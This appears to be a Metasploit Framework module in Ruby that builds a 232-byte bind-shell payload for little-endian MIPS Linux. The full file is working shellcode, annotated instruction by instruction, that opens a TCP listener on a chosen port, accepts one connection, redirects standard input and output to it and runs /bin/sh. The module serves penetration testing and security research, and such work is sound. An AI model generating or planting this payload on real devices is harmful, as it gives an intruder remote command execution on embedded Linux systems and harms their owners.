Path: blob/master/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Single-stage ("inline") payload for little-endian MIPS Linux: the shellcode
# opens a TCP listener on LPORT, accepts one connection, redirects stdin/stdout/
# stderr to it and executes /bin/sh. Handler and session classes are wired in
# #initialize; the raw bytes are assembled in #generate.
module MetasploitModule

  # Byte length of the shellcode built in #generate (58 four-byte MIPS
  # instructions). Presumably consumed by the framework's payload cache --
  # keep it in sync if the instruction sequence ever changes.
  CachedSize = 232

  include Msf::Payload::Single
  include Msf::Payload::Linux
  include Msf::Sessions::CommandShellOptions

  # Registers module metadata (name, authors, platform/arch, handler and
  # session classes) with the framework.
  #
  # @param info [Hash] caller-supplied info merged over the defaults via merge_info
  def initialize(info = {})
    super(merge_info(info,
      'Name' => 'Linux Command Shell, Bind TCP Inline',
      'Description' => 'Listen for a connection and spawn a command shell',
      'Author' =>
        [
          'scut', # Original mips-irix-portshell shellcode
          'vaicebine', # Original shellcode mod
          'Vlatko Kosturjak', # Metasploit module
          'juan vazquez' # Small fixes and optimizations
        ],
      'License' => MSF_LICENSE,
      'Platform' => 'linux',
      'Arch' => ARCH_MIPSLE,
      'Handler' => Msf::Handler::BindTcp,
      'Session' => Msf::Sessions::CommandShellUnix,
      'Payload' =>
        {
          # No runtime patching: the port is baked in at generation time.
          'Offsets' => {} ,
          'Payload' => ''
        })
    )
  end

  # Assembles the shellcode for the configured LPORT.
  #
  # @param _opts [Hash] unused here; forwarded to the superclass via the bare `super`
  # @return [String] the superclass's output alone when LPORT is unset, otherwise
  #   that output followed by the 232-byte MIPS shellcode
  # @raise [ArgumentError] if LPORT is set but is not an integer string
  #   (Integer() is strict, unlike to_i)
  def generate(_opts = {})
    if !datastore['LPORT']
      return super
    end

    port = Integer(datastore['LPORT'])
    # Network byte order, split into the two bytes that become the immediate
    # of the `li t5` instruction below.
    # NOTE(review): pack("n") keeps only the low 16 bits, so a value above
    # 65535 is silently truncated rather than rejected. unpack("cc") yields
    # signed bytes; pack("C2") wraps them back to the same unsigned octets.
    port = [port].pack("n").unpack("cc");

    # Every word is chosen to be NUL-free (e.g. `nor reg,-3,zero` to obtain 2,
    # `slti reg,zero,-1` to obtain 0). The `syscall` word 0x0101010c carries a
    # non-zero code field (0x40404), which is not used for dispatch.
    shellcode =
      # sock = socket(AF_INET=2, SOCK_STREAM=2, 0)
      "\xe0\xff\xbd\x27" + # addiu sp,sp,-32
      "\xfd\xff\x0e\x24" + # li t6,-3
      "\x27\x20\xc0\x01" + # nor a0,t6,zero
      "\x27\x28\xc0\x01" + # nor a1,t6,zero
      "\xff\xff\x06\x28" + # slti a2,zero,-1
      "\x57\x10\x02\x24" + # li v0,4183 ( __NR_socket )
      "\x0c\x01\x01\x01" + # syscall

      # Build struct sockaddr_in at sp-32 ({AF_INET, port} in the first word,
      # remaining 12 bytes zero) and bind(sock, &addr, 16).
      "\xff\xff\x50\x30" + # andi s0,v0,0xffff
      "\xef\xff\x0e\x24" + # li t6,-17 ; t6: 0xffffffef
      "\x27\x70\xc0\x01" + # nor t6,t6,zero ; t6: 0x10 (16)
      port.pack("C2") + "\x0d\x24" + # li t5,0xFFFF (port) ; t5: 0x5c11 (0x115c == 4444 (default LPORT))
      "\x04\x68\xcd\x01" + # sllv t5,t5,t6 ; t5: 0x5c110000
      "\xfd\xff\x0e\x24" + # li t6,-3 ; t6: -3
      "\x27\x70\xc0\x01" + # nor t6,t6,zero ; t6: 0x2
      "\x25\x68\xae\x01" + # or t5,t5,t6 ; t5: 0x5c110002
      "\xe0\xff\xad\xaf" + # sw t5,-32(sp)
      "\xe4\xff\xa0\xaf" + # sw zero,-28(sp)
      "\xe8\xff\xa0\xaf" + # sw zero,-24(sp)
      "\xec\xff\xa0\xaf" + # sw zero,-20(sp)
      "\x25\x20\x10\x02" + # or a0,s0,s0
      "\xef\xff\x0e\x24" + # li t6,-17
      "\x27\x30\xc0\x01" + # nor a2,t6,zero ; a2: 16 (sizeof sockaddr_in)
      "\xe0\xff\xa5\x23" + # addi a1,sp,-32
      "\x49\x10\x02\x24" + # li v0,4169 ( __NR_bind )
      "\x0c\x01\x01\x01" + # syscall

      # listen(sock, 257)
      "\x25\x20\x10\x02" + # or a0,s0,s0
      "\x01\x01\x05\x24" + # li a1,257
      "\x4e\x10\x02\x24" + # li v0,4174 ( __NR_listen )
      "\x0c\x01\x01\x01" + # syscall

      # client = accept(sock, NULL, NULL)
      "\x25\x20\x10\x02" + # or a0,s0,s0
      "\xff\xff\x05\x28" + # slti a1,zero,-1
      "\xff\xff\x06\x28" + # slti a2,zero,-1
      "\x48\x10\x02\x24" + # li v0,4168 ( __NR_accept )
      "\x0c\x01\x01\x01" + # syscall

      # dup2(client, fd) for fd = 2, 1, 0 (s1 counts down from 2 until it hits -1).
      # NOTE(review): the spill slot at -1(sp) is an unaligned word access.
      "\xff\xff\xa2\xaf" + # sw v0,-1(sp) # socket
      "\xfd\xff\x11\x24" + # li s1,-3
      "\x27\x88\x20\x02" + # nor s1,s1,zero ; s1: 2
      "\xff\xff\xa4\x8f" + # lw a0,-1(sp)
      "\x21\x28\x20\x02" + # move a1,s1 # dup2_loop
      "\xdf\x0f\x02\x24" + # li v0,4063 ( __NR_dup2 )
      "\x0c\x01\x01\x01" + # syscall 0x40404
      "\xff\xff\x10\x24" + # li s0,-1
      "\xff\xff\x31\x22" + # addi s1,s1,-1
      "\xfa\xff\x30\x16" + # bne s1,s0 <dup2_loop>

      # execve("//bin/sh", ["//bin/sh", NULL], NULL): the path is written at
      # sp-20 as two little-endian words plus a NUL word, argv at sp-8.
      "\xff\xff\x06\x28" + # slti a2,zero,-1 ; envp = NULL
      "\x62\x69\x0f\x3c" + # lui t7,0x6962
      "\x2f\x2f\xef\x35" + # ori t7,t7,0x2f2f ; t7: 0x69622f2f -> "//bi" in memory
      "\xec\xff\xaf\xaf" + # sw t7,-20(sp)
      "\x73\x68\x0e\x3c" + # lui t6,0x6873
      "\x6e\x2f\xce\x35" + # ori t6,t6,0x2f6e ; t6: 0x68732f6e -> "n/sh" in memory
      "\xf0\xff\xae\xaf" + # sw t6,-16(sp)
      "\xf4\xff\xa0\xaf" + # sw zero,-12(sp) ; terminating NUL
      "\xec\xff\xa4\x27" + # addiu a0,sp,-20 ; a0 = path
      "\xf8\xff\xa4\xaf" + # sw a0,-8(sp) ; argv[0]
      "\xfc\xff\xa0\xaf" + # sw zero,-4(sp) ; argv[1] = NULL
      "\xf8\xff\xa5\x27" + # addiu a1,sp,-8 ; a1 = argv
      "\xab\x0f\x02\x24" + # li v0,4011 ( __NR_execve )
      "\x0c\x01\x01\x01" # syscall 0x40404

    return super + shellcode
  end
end